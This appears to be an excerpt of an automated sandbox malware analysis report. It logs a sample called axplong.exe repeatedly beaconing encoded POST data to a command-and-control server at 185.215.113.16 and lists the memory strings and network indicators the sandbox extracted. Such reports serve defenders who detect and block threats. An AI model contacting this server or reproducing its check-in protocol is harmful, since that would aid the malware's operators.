                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownDNS traffic detected: query: 241.42.69.40.in-addr.arpa replaycode: Name error (3)
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B2BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_00B2BD60
                    Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2995896267.0000000001386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php$BG
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php.
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4079-b30a-7368302a1ad4LMEMp
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php6B
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php?
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpI
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpa
                    Source: axplong.exe, 00000006.00000002.2995896267.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedgB
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpj
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpm
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedBB
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedlB
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpt
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
                    Source: axplong.exe, 00000006.00000002.2995896267.0000000001386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpw
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpyB

                    System Summary

                    barindex
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
